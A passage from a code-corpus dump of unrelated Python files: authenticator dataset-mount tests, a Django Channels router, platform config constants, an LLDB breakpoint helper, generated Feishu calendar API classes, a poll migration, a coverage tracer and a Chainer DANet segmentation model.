self.assertEqual(result, False)
    def test_mount_git_datasets_not_global_but_in_launch_group(self):
annotations = dict(mountRoot='/datasets',
launchGroupOnly='true',
homeSymlink='true', volumeName='foo')
auth_state = dict(
launch_context=self.builder.launch_context,
oauth_user=self.builder.data
)
self.authenticator.symlinks = []
self.authenticator.chown_extra = []
self.builder.add_dataset_role(
group_name='phusers', name='fake_project', dataset_type='git', dataset_global=False, writable=True, **annotations)
global_datasets = self.authenticator.get_global_datasets(auth_state['launch_context']['groups'])
datasets_in_launch_group = self.authenticator.get_datasets_in_launch_group(
launch_group_name='phusers', auth_state=auth_state)
result = self.authenticator.mount_dataset(self.spawner, global_datasets, datasets_in_launch_group, 'fake_project', self.builder.get_datasets()[0])
self.assertEqual(result, True)
def test_mount_datasets_is_global(self):
annotations = dict(mountRoot='/datasets',
homeSymlink='true', volumeName='foo')
auth_state = dict(
launch_context=self.builder.launch_context,
oauth_user=self.builder.data
)
self.authenticator.symlinks = []
self.authenticator.chown_extra = []
self.builder.add_dataset_role(
group_name='everyone', name='fake_global', dataset_type='git', dataset_global=True, writable=True, **annotations)
global_datasets = self.authenticator.get_global_datasets(auth_state['launch_context']['groups'])
datasets_in_launch_group = self.authenticator.get_datasets_in_launch_group(
launch_group_name='read_only_group', auth_state=auth_state)
result = self.authenticator.mount_dataset(self.spawner, global_datasets, datasets_in_launch_group, 'fake_global', self.builder.get_datasets()[0])
self.assertEqual(result, True)
def test_get_datasets_in_launch_group(self):
self.builder.add_group('read_only_group')
annotations = dict(mountRoot='/datasets',
homeSymlink='true', volumeName='foo')
auth_state = dict(
launch_context=self.builder.launch_context,
oauth_user=self.builder.data
)
self.builder.add_dataset_role(
group_name='read_only_group', name='foo', dataset_type='pv', writable=True, **annotations)
datasets_in_launch_group = self.authenticator.get_datasets_in_launch_group(
launch_group_name='read_only_group', auth_state=auth_state)
self.assertEqual(datasets_in_launch_group.get('foo').get('writable'), True)
def test_get_datasets_in_launch_group_without_right_group(self):
auth_state = dict(
launch_context=self.builder.launch_context,
oauth_user=self.builder.data
)
annotations = dict(mountRoot='/datasets',
launchGroupOnly='false',
homeSymlink='true', volumeName='foo')
self.builder.add_dataset_role(
group_name='read_only_group', name='foo-test', dataset_type='pv', dataset_global=True, writable=True, **annotations)
datasets_in_launch_group = self.authenticator.get_datasets_in_launch_group(
launch_group_name='read_only_group', auth_state=auth_state)
self.assertEqual({}, datasets_in_launch_group)
def test_get_global_datasets(self):
self.builder.add_group('read_only_group')
annotations = dict(mountRoot='/datasets',
homeSymlink='true', volumeName='foo')
self.builder.add_dataset_role(
group_name='read_only_group', name='foo_global', dataset_type='pv', writable=True, dataset_global=True, **annotations)
self.builder.add_dataset_role(
group_name='read_only_group', name='foo_private', dataset_type='pv', writable=True, dataset_global=False, **annotations)
auth_state = dict(
launch_context=self.builder.launch_context,
oauth_user=self.builder.data
)
self.assertNotEqual(self.authenticator.get_global_datasets(auth_state['launch_context']['groups']).get('foo_global', None), None)
self.assertEqual(self.authenticator.get_global_datasets(auth_state['launch_context']['groups']).get('foo_private', None), None)
@testing.gen_test
async def test_safe_mode_feature(self):
# verify default behavior: safe_mode=False
self.spawner.volume_mounts.append({'mountPath': '/home/jovyan'})
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual({'mountPath': '/home/jovyan'}, self.spawner.volume_mounts[0])
self.spawner.enable_safe_mode = True
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual({'mountPath': '/home/jovyan/user'}, self.spawner.volume_mounts[0])
| StarcoderdataPython |
3302997 | from channels.auth import AuthMiddlewareStack
from channels.routing import ProtocolTypeRouter, URLRouter
import session.routing as rout
application = ProtocolTypeRouter({
# http->django views is added by default
'websocket': AuthMiddlewareStack(
URLRouter(
rout.websocket_urlpatterns
)
),
})
| StarcoderdataPython |
1739146 | # Repository: etaivan/stx-config
#
# Copyright (c) 2016-2018 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
from sysinv.common import constants as sysinv_constants
from tsconfig import tsconfig
CONFIG_WORKDIR = '/tmp/config'
CGCS_CONFIG_FILE = CONFIG_WORKDIR + '/cgcs_config'
CONFIG_PERMDIR = tsconfig.CONFIG_PATH
HIERADATA_WORKDIR = '/tmp/hieradata'
HIERADATA_PERMDIR = tsconfig.PUPPET_PATH + 'hieradata'
KEYRING_WORKDIR = '/tmp/python_keyring'
KEYRING_PERMDIR = tsconfig.KEYRING_PATH
INITIAL_CONFIG_COMPLETE_FILE = '/etc/platform/.initial_config_complete'
CONFIG_FAIL_FILE = '/var/run/.config_fail'
COMMON_CERT_FILE = "/etc/ssl/private/server-cert.pem"
FIREWALL_RULES_FILE = '/etc/platform/iptables.rules'
OPENSTACK_PASSWORD_RULES_FILE = '/etc/keystone/password-rules.conf'
INSTALLATION_FAILED_FILE = '/etc/platform/installation_failed'
BACKUPS_PATH = '/opt/backups'
INTERFACES_LOG_FILE = "/tmp/configure_interfaces.log"
TC_SETUP_SCRIPT = '/usr/local/bin/cgcs_tc_setup.sh'
LINK_MTU_DEFAULT = "1500"
CINDER_LVM_THIN = "thin"
CINDER_LVM_THICK = "thick"
DEFAULT_IMAGE_STOR_SIZE = \
sysinv_constants.DEFAULT_IMAGE_STOR_SIZE
DEFAULT_DATABASE_STOR_SIZE = \
sysinv_constants.DEFAULT_DATABASE_STOR_SIZE
DEFAULT_IMG_CONVERSION_STOR_SIZE = \
sysinv_constants.DEFAULT_IMG_CONVERSION_STOR_SIZE
DEFAULT_SMALL_IMAGE_STOR_SIZE = \
sysinv_constants.DEFAULT_SMALL_IMAGE_STOR_SIZE
DEFAULT_SMALL_DATABASE_STOR_SIZE = \
sysinv_constants.DEFAULT_SMALL_DATABASE_STOR_SIZE
DEFAULT_SMALL_IMG_CONVERSION_STOR_SIZE = \
sysinv_constants.DEFAULT_SMALL_IMG_CONVERSION_STOR_SIZE
DEFAULT_SMALL_BACKUP_STOR_SIZE = \
sysinv_constants.DEFAULT_SMALL_BACKUP_STOR_SIZE
DEFAULT_VIRTUAL_IMAGE_STOR_SIZE = \
sysinv_constants.DEFAULT_VIRTUAL_IMAGE_STOR_SIZE
DEFAULT_VIRTUAL_DATABASE_STOR_SIZE = \
sysinv_constants.DEFAULT_VIRTUAL_DATABASE_STOR_SIZE
DEFAULT_VIRTUAL_IMG_CONVERSION_STOR_SIZE = \
sysinv_constants.DEFAULT_VIRTUAL_IMG_CONVERSION_STOR_SIZE
DEFAULT_VIRTUAL_BACKUP_STOR_SIZE = \
sysinv_constants.DEFAULT_VIRTUAL_BACKUP_STOR_SIZE
DEFAULT_EXTENSION_STOR_SIZE = \
sysinv_constants.DEFAULT_EXTENSION_STOR_SIZE
SYSTEM_CONFIG_TIMEOUT = 300
SERVICE_ENABLE_TIMEOUT = 180
MINIMUM_ROOT_DISK_SIZE = 500
MAXIMUM_CGCS_LV_SIZE = 500
LDAP_CONTROLLER_CONFIGURE_TIMEOUT = 30
WRSROOT_MAX_PASSWORD_AGE = 45 # 45 days
LAG_MODE_ACTIVE_BACKUP = "active-backup"
LAG_MODE_BALANCE_XOR = "balance-xor"
LAG_MODE_8023AD = "802.3ad"
LAG_TXHASH_LAYER2 = "layer2"
LAG_MIIMON_FREQUENCY = 100
LOOPBACK_IFNAME = 'lo'
DEFAULT_MULTICAST_SUBNET_IPV4 = '172.16.31.10/28'
DEFAULT_MULTICAST_SUBNET_IPV6 = 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b:1:0/124'
DEFAULT_MGMT_ON_LOOPBACK_SUBNET_IPV4 = '192.168.204.0/28'
DEFAULT_REGION_NAME = "RegionOne"
DEFAULT_SERVICE_PROJECT_NAME = "services"
SSH_WARNING_MESSAGE = "WARNING: Command should only be run from the " \
"console. Continuing with this terminal may cause " \
"loss of connectivity and configuration failure."
SSH_ERROR_MESSAGE = "ERROR: Command should only be run from the console."
| StarcoderdataPython |
1673923 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import lldb
import re
import optparse
import ds
import shlex
class GlobalOptions(object):
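    # Maps breakpoint ID -> (symbols to match in the stack, parsed options); shared between the command and the breakpoint callback.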
symbols = {}
@staticmethod
def addSymbols(symbols, options, breakpoint):
key = str(breakpoint.GetID())
GlobalOptions.symbols[key] = (symbols, options)
def __lldb_init_module(debugger, internal_dict):
debugger.HandleCommand(
'command script add -f breakifonfunc.breakifonfunc biof')
def breakifonfunc(debugger, command, exe_ctx, result, internal_dict):
'''
usage: biof [ModuleName] regex1 ||| [ModuleName2] regex2
Regex breakpoint that stops only if the second regex breakpoint is in the stack trace
For example, to only stop if code in the Test module resulted the setTintColor: being called
biof setTintColor: ||| . Test
'''
command_args = shlex.split(command, posix=False)
parser = generateOptionParser()
try:
(options, args) = parser.parse_args(command_args)
    except Exception as e:
result.SetError(e)
return
# if len(args) >= 2:
# result.SetError(parser.usage)
# return
target = exe_ctx.target
# if len(command.split('|||')) != 2:
# result.SetError(parser.usage)
t = " ".join(args).split('|||')
clean_command = t[0].strip().split()
if len(clean_command) == 2:
breakpoint = target.BreakpointCreateByRegex(clean_command[0], clean_command[1])
else:
breakpoint = target.BreakpointCreateByRegex(clean_command[0], None)
moduleName = t[1].strip().split()[1]
module = target.module[moduleName]
if not module:
result.SetError('Invalid module {}'.format(moduleName))
return
searchQuery = t[1].strip().split()[0]
s = [i for i in module.symbols if re.search(searchQuery, i.name)]
GlobalOptions.addSymbols(s, options, breakpoint)
breakpoint.SetScriptCallbackFunction("breakifonfunc.breakpointHandler")
if not breakpoint.IsValid() or breakpoint.num_locations == 0:
result.AppendWarning("Breakpoint isn't valid or hasn't found any hits: " + clean_command[0])
else:
result.AppendMessage("\"{}\" produced {} hits\nOnly will stop if the following stack frame symbols contain:\n{}` \"{}\" produced {} hits".format(
clean_command[0], breakpoint.num_locations, module.file.basename, searchQuery, len(s)) )
def breakpointHandler(frame, bp_loc, dict):
if len(GlobalOptions.symbols) == 0:
print("womp something internal called reload LLDB init which removed the global symbols")
return True
key = str(bp_loc.GetBreakpoint().GetID())
searchSymbols = GlobalOptions.symbols[key][0]
options = GlobalOptions.symbols[key][1]
function_name = frame.GetFunctionName()
thread = frame.thread
if options.direct_call:
frame = thread.frame[1]
        print(frame)
symbol = frame.symbol
return any([symbol in searchSymbols])
s = [i.symbol for i in thread.frames]
return any(x in s for x in searchSymbols)
def generateOptionParser():
usage = breakifonfunc.__doc__
parser = optparse.OptionParser(usage=usage, prog="biof")
parser.add_option("-d", "--direct",
action="store_true",
default=False,
dest="direct_call",
help="Only stop if the second regex directly calls the breakpoint")
return parser
| StarcoderdataPython |
1757354 | # Repository: ToniIvars/django-poll
# Generated by Django 3.2.3 on 2021-05-18 10:34
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Poll',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='author', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PollAnswer',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('answer', models.CharField(max_length=50)),
('votes', models.IntegerField()),
],
),
migrations.CreateModel(
name='PollQuestion',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('answers', models.ManyToManyField(related_name='answers', to='my_polls.PollAnswer')),
('poll', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='poll', to='my_polls.poll')),
],
),
migrations.AddField(
model_name='pollanswer',
name='poll_question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='poll_question', to='my_polls.pollquestion'),
),
migrations.AddField(
model_name='poll',
name='questions',
field=models.ManyToManyField(related_name='questions', to='my_polls.PollQuestion'),
),
]
| StarcoderdataPython |
3323690 | # File: resource/convert.py
# coding=UTF-8
import time
def convert(path):
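    """Re-encode a GBK file: read its bytes, decode as GBK, and write the text to a new file named with a timestamp suffix (platform default encoding)."""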
content = ""
with open(path, 'rb') as f:
content = f.read()
content = content.decode("gbk")
with open(path + "_" + str(time.time()), 'w') as f:
f.write(content)
if __name__ == "__main__":
convert("myself.html")
| StarcoderdataPython |
4804335 | # Code generated by lark_sdk_gen. DO NOT EDIT.
from pylark.lark_request import RawRequestReq, _new_method_option
from pylark import lark_type, lark_type_sheet, lark_type_approval
import attr
import typing
import io
@attr.s
class CreateCalendarEventAttendeeReqAttendee(object):
type: lark_type.CalendarEventAttendeeType = attr.ib(
default=None, metadata={"req_type": "json", "key": "type"}
    ) # Attendee type; creating email attendees is not supported yet. Example: "user". Possible values: `user`: user, `chat`: group chat, `resource`: meeting room, `third_party`: email
is_optional: bool = attr.ib(
default=None, metadata={"req_type": "json", "key": "is_optional"}
    ) # Whether the attendee is "optional"; this field cannot be edited for chat attendees. Example: true. Default: `false`
user_id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "user_id"}
    ) # The attendee's user id; the value depends on user_id_type. When is_external is true, only open_id or union_id is returned. Example: "ou_xxxxxxxx"
chat_id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "chat_id"}
    ) # Group chat_id for attendees of type chat. Example: "oc_xxxxxxxxx"
room_id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "room_id"}
    ) # Meeting-room room_id for attendees of type resource. Example: "omm_xxxxxxxx"
third_party_email: str = attr.ib(
default="", metadata={"req_type": "json", "key": "third_party_email"}
    ) # Email address for attendees of type third_party. Example: "<EMAIL>"
operate_id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "operate_id"}
    ) # When the event was created with an app identity, this specifies the meeting-room contact shown in the room view when adding a room. Example: "ou_xxxxxxxx"
@attr.s
class CreateCalendarEventAttendeeReq(object):
user_id_type: lark_type.IDType = attr.ib(
default=None, metadata={"req_type": "query", "key": "user_id_type"}
    ) # User ID type. Example: "open_id". Possible values: `open_id`: the user's open id, `union_id`: the user's union id, `user_id`: the user's user id. Default: `open_id`. When set to `user_id`, the "obtain user user ID" field permission is required
calendar_id: str = attr.ib(
default="", metadata={"req_type": "path", "key": "calendar_id"}
    ) # Calendar ID. Example: "<EMAIL>u.cn"
event_id: str = attr.ib(
default="", metadata={"req_type": "path", "key": "event_id"}
    ) # Event ID. Example: "xxxxxxxxx_0"
attendees: typing.List[CreateCalendarEventAttendeeReqAttendee] = attr.ib(
factory=lambda: [], metadata={"req_type": "json", "key": "attendees"}
    ) # List of attendees to add
need_notification: bool = attr.ib(
default=None, metadata={"req_type": "json", "key": "need_notification"}
    ) # Whether to send a bot notification to attendees; defaults to true. Example: false
@attr.s
class CreateCalendarEventAttendeeRespAttendeeChatMember(object):
rsvp_status: str = attr.ib(
default="", metadata={"req_type": "json", "key": "rsvp_status"}
    ) # Attendee RSVP status. Possible values: `needs_action`: no reply yet, or the room reservation is pending, `accept`: accepted, or the room reservation succeeded, `tentative`: replied tentative, `decline`: declined, or the room reservation failed, `removed`: the attendee or room has been removed from the event
is_optional: bool = attr.ib(
factory=lambda: bool(), metadata={"req_type": "json", "key": "is_optional"}
    ) # Whether the attendee is "optional"
display_name: str = attr.ib(
default="", metadata={"req_type": "json", "key": "display_name"}
    ) # Attendee name
is_organizer: bool = attr.ib(
factory=lambda: bool(), metadata={"req_type": "json", "key": "is_organizer"}
    ) # Whether the attendee is the event organizer
is_external: bool = attr.ib(
factory=lambda: bool(), metadata={"req_type": "json", "key": "is_external"}
    ) # Whether the attendee is an external attendee
@attr.s
class CreateCalendarEventAttendeeRespAttendee(object):
type: lark_type.CalendarEventAttendeeType = attr.ib(
factory=lambda: lark_type.CalendarEventAttendeeType(),
metadata={"req_type": "json", "key": "type"},
    ) # Attendee type; creating email attendees is not supported yet. Possible values: `user`: user, `chat`: group chat, `resource`: meeting room, `third_party`: email
attendee_id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "attendee_id"}
    ) # Attendee ID
rsvp_status: str = attr.ib(
default="", metadata={"req_type": "json", "key": "rsvp_status"}
    ) # Attendee RSVP status. Possible values: `needs_action`: no reply yet, or the room reservation is pending, `accept`: accepted, or the room reservation succeeded, `tentative`: replied tentative, `decline`: declined, or the room reservation failed, `removed`: the attendee or room has been removed from the event
is_optional: bool = attr.ib(
factory=lambda: bool(), metadata={"req_type": "json", "key": "is_optional"}
    ) # Whether the attendee is "optional"; this field cannot be edited for chat attendees
is_organizer: bool = attr.ib(
factory=lambda: bool(), metadata={"req_type": "json", "key": "is_organizer"}
    ) # Whether the attendee is the event organizer
is_external: bool = attr.ib(
factory=lambda: bool(), metadata={"req_type": "json", "key": "is_external"}
    ) # Whether the attendee is an external attendee; external attendees cannot be edited
display_name: str = attr.ib(
default="", metadata={"req_type": "json", "key": "display_name"}
    ) # Attendee name
chat_members: typing.List[
CreateCalendarEventAttendeeRespAttendeeChatMember
] = attr.ib(
factory=lambda: [], metadata={"req_type": "json", "key": "chat_members"}
    ) # Members of the group chat, valid when type is Chat; chat members cannot be edited
user_id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "user_id"}
    ) # The attendee's user id; the value depends on user_id_type. When is_external is true, only open_id or union_id is returned
chat_id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "chat_id"}
    ) # Group chat_id for attendees of type chat
room_id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "room_id"}
    ) # Meeting-room room_id for attendees of type resource
third_party_email: str = attr.ib(
default="", metadata={"req_type": "json", "key": "third_party_email"}
    ) # Email address for attendees of type third_party
operate_id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "operate_id"}
    ) # When the event was created with an app identity, this specifies the meeting-room contact shown in the room view when adding a room
@attr.s
class CreateCalendarEventAttendeeResp(object):
attendees: typing.List[CreateCalendarEventAttendeeRespAttendee] = attr.ib(
factory=lambda: [], metadata={"req_type": "json", "key": "attendees"}
    ) # The event's full attendee list after the new attendees are added
def _gen_create_calendar_event_attendee_req(request, options) -> RawRequestReq:
return RawRequestReq(
dataclass=CreateCalendarEventAttendeeResp,
scope="Calendar",
api="CreateCalendarEventAttendee",
method="POST",
url="https://open.feishu.cn/open-apis/calendar/v4/calendars/:calendar_id/events/:event_id/attendees",
body=request,
method_option=_new_method_option(options),
need_tenant_access_token=True,
need_user_access_token=True,
)
| StarcoderdataPython |
137232 | # GitHub stars: 100-1000
"""
Coverage tracking internals.
"""
import sys
import threading
err = sys.stderr
import types, symbol
# use builtin sets if in >= 2.4, otherwise use 'sets' module.
try:
set()
except NameError:
from sets import Set as set
def get_interesting_lines(code):
"""
Count 'interesting' lines of Python in a code object, where
'interesting' is defined as 'lines that could possibly be
executed'.
This is done by dissassembling the code objecte and returning
line numbers.
"""
# clean up weird end-of-file issues
lines = set([ l for (o, l) in findlinestarts(code) ])
for const in code.co_consts:
if type(const) == types.CodeType:
lines.update(get_interesting_lines(const))
return lines
def findlinestarts(code):
"""Find the offsets in a byte code which are start of lines in the source.
Generate pairs (offset, lineno) as described in Python/compile.c.
CTB -- swiped from Python 2.5, module 'dis', so that earlier versions
of Python could use the function, too.
"""
byte_increments = [ord(c) for c in code.co_lnotab[0::2]]
line_increments = [ord(c) for c in code.co_lnotab[1::2]]
lastlineno = None
lineno = code.co_firstlineno
addr = 0
for byte_incr, line_incr in zip(byte_increments, line_increments):
if byte_incr:
if lineno != lastlineno:
yield (addr, lineno)
lastlineno = lineno
addr += byte_incr
lineno += line_incr
if lineno != lastlineno:
yield (addr, lineno)
class CodeTracer:
"""
Basic mechanisms for code coverage tracking, using sys.settrace.
"""
def __init__(self, exclude_prefix, include_only_prefix):
self.common = self.c = set()
self.section_name = None
self.sections = {}
self.started = False
assert not (exclude_prefix and include_only_prefix), \
"mutually exclusive"
self.excl = exclude_prefix
self.incl = include_only_prefix
def start(self):
"""
Start recording.
"""
if not self.started:
self.started = True
if self.excl and not self.incl:
global_trace_fn = self.g1
elif self.incl and not self.excl:
global_trace_fn = self.g2
else:
global_trace_fn = self.g0
sys.settrace(global_trace_fn)
if hasattr(threading, 'settrace'):
threading.settrace(global_trace_fn)
def stop(self):
if self.started:
sys.settrace(None)
if hasattr(threading, 'settrace'):
threading.settrace(None)
self.started = False
self.stop_section()
def g0(self, f, e, a):
"""
global trace function, no exclude/include info.
f == frame, e == event, a == arg .
"""
if e == 'call':
return self.t
def g1(self, f, e, a):
"""
global trace function like g0, but ignores files starting with
'self.excl'.
"""
if e == 'call':
excl = self.excl
path = f.f_globals.get('__file__')
if path is None:
path = f.f_code.co_filename
if excl and path.startswith(excl):
return
return self.t
def g2(self, f, e, a):
"""
global trace function like g0, but only records files starting with
'self.incl'.
"""
if e == 'call':
incl = self.incl
if incl and f.f_code.co_filename.startswith(incl):
return self.t
def t(self, f, e, a):
"""
local trace function.
"""
        if e == 'line':
self.c.add((f.f_code.co_filename, f.f_lineno))
return self.t
def clear(self):
"""
wipe out coverage info
"""
        self.c = set()
def start_section(self, name):
self.stop_section()
self.section_name = name
self.c = self.sections.get(name, set())
def stop_section(self):
if self.section_name:
self.sections[self.section_name] = self.c
self.section_name = None
self.c = self.common
class CoverageData:
"""
A class to manipulate and combine data from the CodeTracer object.
In general, do not pickle this object; it's simpler and more
straightforward to just pass the basic Python objects around
(e.g. CoverageData.common, a set, and CoverageData.sections, a
dictionary of sets).
"""
def __init__(self, trace_obj=None):
self.common = set()
self.sections = {}
if trace_obj:
self.update(trace_obj)
def update(self, trace_obj):
# transfer common-block code coverage -- if no sections are set,
# this will be all of the code coverage info.
self.common.update(trace_obj.common)
# update our internal section dictionary with the (filename, line_no)
# pairs from the section coverage as well.
for section_name, section_d in trace_obj.sections.items():
section_set = self.sections.get(section_name, set())
section_set.update(section_d)
self.sections[section_name] = section_set
def gather_files(self, name=None):
"""
Return the dictionary of lines of executed code; the dict
keys are filenames and values are sets containing individual
(integer) line numbers.
'name', if set, is the desired section name from which to gather
coverage info.
"""
cov = set()
cov.update(self.common)
if name is None:
for section_name, coverage_set in self.sections.items():
cov.update(coverage_set)
else:
coverage_set = self.sections.get(name, set())
cov.update(coverage_set)
# cov = list(cov)
# cov.sort()
files = {}
for (filename, line) in cov: # @CTB could optimize
d = files.get(filename, set())
d.add(line)
files[filename] = d
return files
def gather_sections(self, file):
"""
Return a dictionary of sets containing section coverage information for
a specific file. Dict keys are sections, and the dict values are
sets containing (integer) line numbers.
"""
sections = {}
for k, c in self.sections.items():
s = set()
            for (filename, line) in c:
if filename == file:
s.add(line)
sections[k] = s
return sections
| StarcoderdataPython |
164385 | """
DANet for image segmentation, implemented in Chainer.
Original paper: 'Dual Attention Network for Scene Segmentation,' https://arxiv.org/abs/1809.02983.
"""
__all__ = ['DANet', 'danet_resnetd50b_cityscapes', 'danet_resnetd101b_cityscapes']
import os
import chainer.functions as F
from chainer import link
from chainer import Chain
from functools import partial
from chainer.serializers import load_npz
from chainer.variable import Parameter
from chainer.initializers import _get_initializer
from .common import conv1x1, conv3x3_block
from .resnetd import resnetd50b, resnetd101b
class ScaleBlock(link.Link):
"""
Simple scale block.
Parameters:
----------
initial_alpha : obj, default 0
Initializer for the weights.
"""
def __init__(self,
initial_alpha=0):
super(ScaleBlock, self).__init__()
with self.init_scope():
alpha_initializer = _get_initializer(initial_alpha)
self.alpha = Parameter(
initializer=alpha_initializer,
shape=(1,),
name="alpha")
def __call__(self, x):
return self.alpha.data * x
class PosAttBlock(Chain):
"""
Position attention block from 'Dual Attention Network for Scene Segmentation,' https://arxiv.org/abs/1809.02983.
It captures long-range spatial contextual information.
Parameters:
----------
channels : int
Number of channels.
reduction : int, default 8
Squeeze reduction value.
"""
def __init__(self,
channels,
reduction=8):
super(PosAttBlock, self).__init__()
mid_channels = channels // reduction
with self.init_scope():
self.query_conv = conv1x1(
in_channels=channels,
out_channels=mid_channels,
use_bias=True)
self.key_conv = conv1x1(
in_channels=channels,
out_channels=mid_channels,
use_bias=True)
self.value_conv = conv1x1(
in_channels=channels,
out_channels=channels,
use_bias=True)
self.scale = ScaleBlock()
def __call__(self, x):
batch, channels, height, width = x.shape
proj_query = self.query_conv(x).reshape((batch, -1, height * width))
proj_key = self.key_conv(x).reshape((batch, -1, height * width))
proj_value = self.value_conv(x).reshape((batch, -1, height * width))
energy = F.batch_matmul(proj_query, proj_key, transa=True)
w = F.softmax(energy, axis=-1)
y = F.batch_matmul(proj_value, w, transb=True)
y = y.reshape((batch, -1, height, width))
y = self.scale(y) + x
return y
class ChaAttBlock(Chain):
"""
Channel attention block from 'Dual Attention Network for Scene Segmentation,' https://arxiv.org/abs/1809.02983.
It explicitly models interdependencies between channels.
"""
def __init__(self):
super(ChaAttBlock, self).__init__()
with self.init_scope():
self.scale = ScaleBlock()
def __call__(self, x):
batch, channels, height, width = x.shape
proj_query = x.reshape((batch, -1, height * width))
proj_key = x.reshape((batch, -1, height * width))
proj_value = x.reshape((batch, -1, height * width))
energy = F.batch_matmul(proj_query, proj_key, transb=True)
energy_new = F.broadcast_to(F.max(energy, axis=-1, keepdims=True), shape=energy.shape) - energy
w = F.softmax(energy_new, axis=-1)
y = F.batch_matmul(w, proj_value)
y = y.reshape((batch, -1, height, width))
y = self.scale(y) + x
return y
class DANetHeadBranch(Chain):
"""
DANet head branch.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
pose_att : bool, default True
Whether to use position attention instead of channel one.
"""
def __init__(self,
in_channels,
out_channels,
pose_att=True):
super(DANetHeadBranch, self).__init__()
mid_channels = in_channels // 4
dropout_rate = 0.1
with self.init_scope():
self.conv1 = conv3x3_block(
in_channels=in_channels,
out_channels=mid_channels)
if pose_att:
self.att = PosAttBlock(mid_channels)
else:
self.att = ChaAttBlock()
self.conv2 = conv3x3_block(
in_channels=mid_channels,
out_channels=mid_channels)
self.conv3 = conv1x1(
in_channels=mid_channels,
out_channels=out_channels,
use_bias=True)
self.dropout = partial(
F.dropout,
ratio=dropout_rate)
def __call__(self, x):
x = self.conv1(x)
x = self.att(x)
y = self.conv2(x)
x = self.conv3(y)
x = self.dropout(x)
return x, y
class DANetHead(Chain):
"""
DANet head block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
"""
def __init__(self,
in_channels,
out_channels):
super(DANetHead, self).__init__()
mid_channels = in_channels // 4
dropout_rate = 0.1
with self.init_scope():
self.branch_pa = DANetHeadBranch(
in_channels=in_channels,
out_channels=out_channels,
pose_att=True)
self.branch_ca = DANetHeadBranch(
in_channels=in_channels,
out_channels=out_channels,
pose_att=False)
self.conv = conv1x1(
in_channels=mid_channels,
out_channels=out_channels,
use_bias=True)
self.dropout = partial(
F.dropout,
ratio=dropout_rate)
def __call__(self, x):
pa_x, pa_y = self.branch_pa(x)
ca_x, ca_y = self.branch_ca(x)
y = pa_y + ca_y
x = self.conv(y)
x = self.dropout(x)
return x, pa_x, ca_x
class DANet(Chain):
"""
DANet model from 'Dual Attention Network for Scene Segmentation,' https://arxiv.org/abs/1809.02983.
Parameters:
----------
backbone : nn.Sequential
Feature extractor.
backbone_out_channels : int, default 2048
Number of output channels form feature extractor.
aux : bool, default False
Whether to output an auxiliary result.
fixed_size : bool, default True
Whether to expect fixed spatial size of input image.
in_channels : int, default 3
Number of input channels.
in_size : tuple of two ints, default (480, 480)
Spatial size of the expected input image.
classes : int, default 19
Number of segmentation classes.
"""
def __init__(self,
backbone,
backbone_out_channels=2048,
aux=False,
fixed_size=True,
in_channels=3,
in_size=(480, 480),
classes=19):
super(DANet, self).__init__()
assert (in_channels > 0)
assert ((in_size[0] % 8 == 0) and (in_size[1] % 8 == 0))
self.in_size = in_size
self.classes = classes
self.aux = aux
self.fixed_size = fixed_size
with self.init_scope():
self.backbone = backbone
self.head = DANetHead(
in_channels=backbone_out_channels,
out_channels=classes)
def __call__(self, x):
in_size = self.in_size if self.fixed_size else x.shape[2:]
x, _ = self.backbone(x)
x, y, z = self.head(x)
x = F.resize_images(x, output_shape=in_size)
if self.aux:
y = F.resize_images(y, output_shape=in_size)
z = F.resize_images(z, output_shape=in_size)
return x, y, z
else:
return x
def get_danet(backbone,
classes,
aux=False,
model_name=None,
pretrained=False,
root=os.path.join("~", ".chainer", "models"),
**kwargs):
"""
Create DANet model with specific parameters.
Parameters:
----------
backbone : nn.Sequential
Feature extractor.
classes : int
Number of segmentation classes.
aux : bool, default False
Whether to output an auxiliary result.
model_name : str or None, default None
Model name for loading pretrained model.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.chainer/models'
Location for keeping the model parameters.
"""
net = DANet(
backbone=backbone,
classes=classes,
aux=aux,
**kwargs)
if pretrained:
if (model_name is None) or (not model_name):
raise ValueError("Parameter `model_name` should be properly initialized for loading pretrained model.")
from .model_store import get_model_file
load_npz(
file=get_model_file(
model_name=model_name,
local_model_store_dir_path=root),
obj=net)
return net
def danet_resnetd50b_cityscapes(pretrained_backbone=False, classes=19, aux=True, **kwargs):
"""
DANet model on the base of ResNet(D)-50b for Cityscapes from 'Dual Attention Network for Scene Segmentation,'
https://arxiv.org/abs/1809.02983.
Parameters:
----------
pretrained_backbone : bool, default False
Whether to load the pretrained weights for feature extractor.
classes : int, default 19
Number of segmentation classes.
aux : bool, default True
Whether to output an auxiliary result.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.chainer/models'
Location for keeping the model parameters.
"""
backbone = resnetd50b(pretrained=pretrained_backbone, ordinary_init=False, bends=(3,)).features
del backbone.final_pool
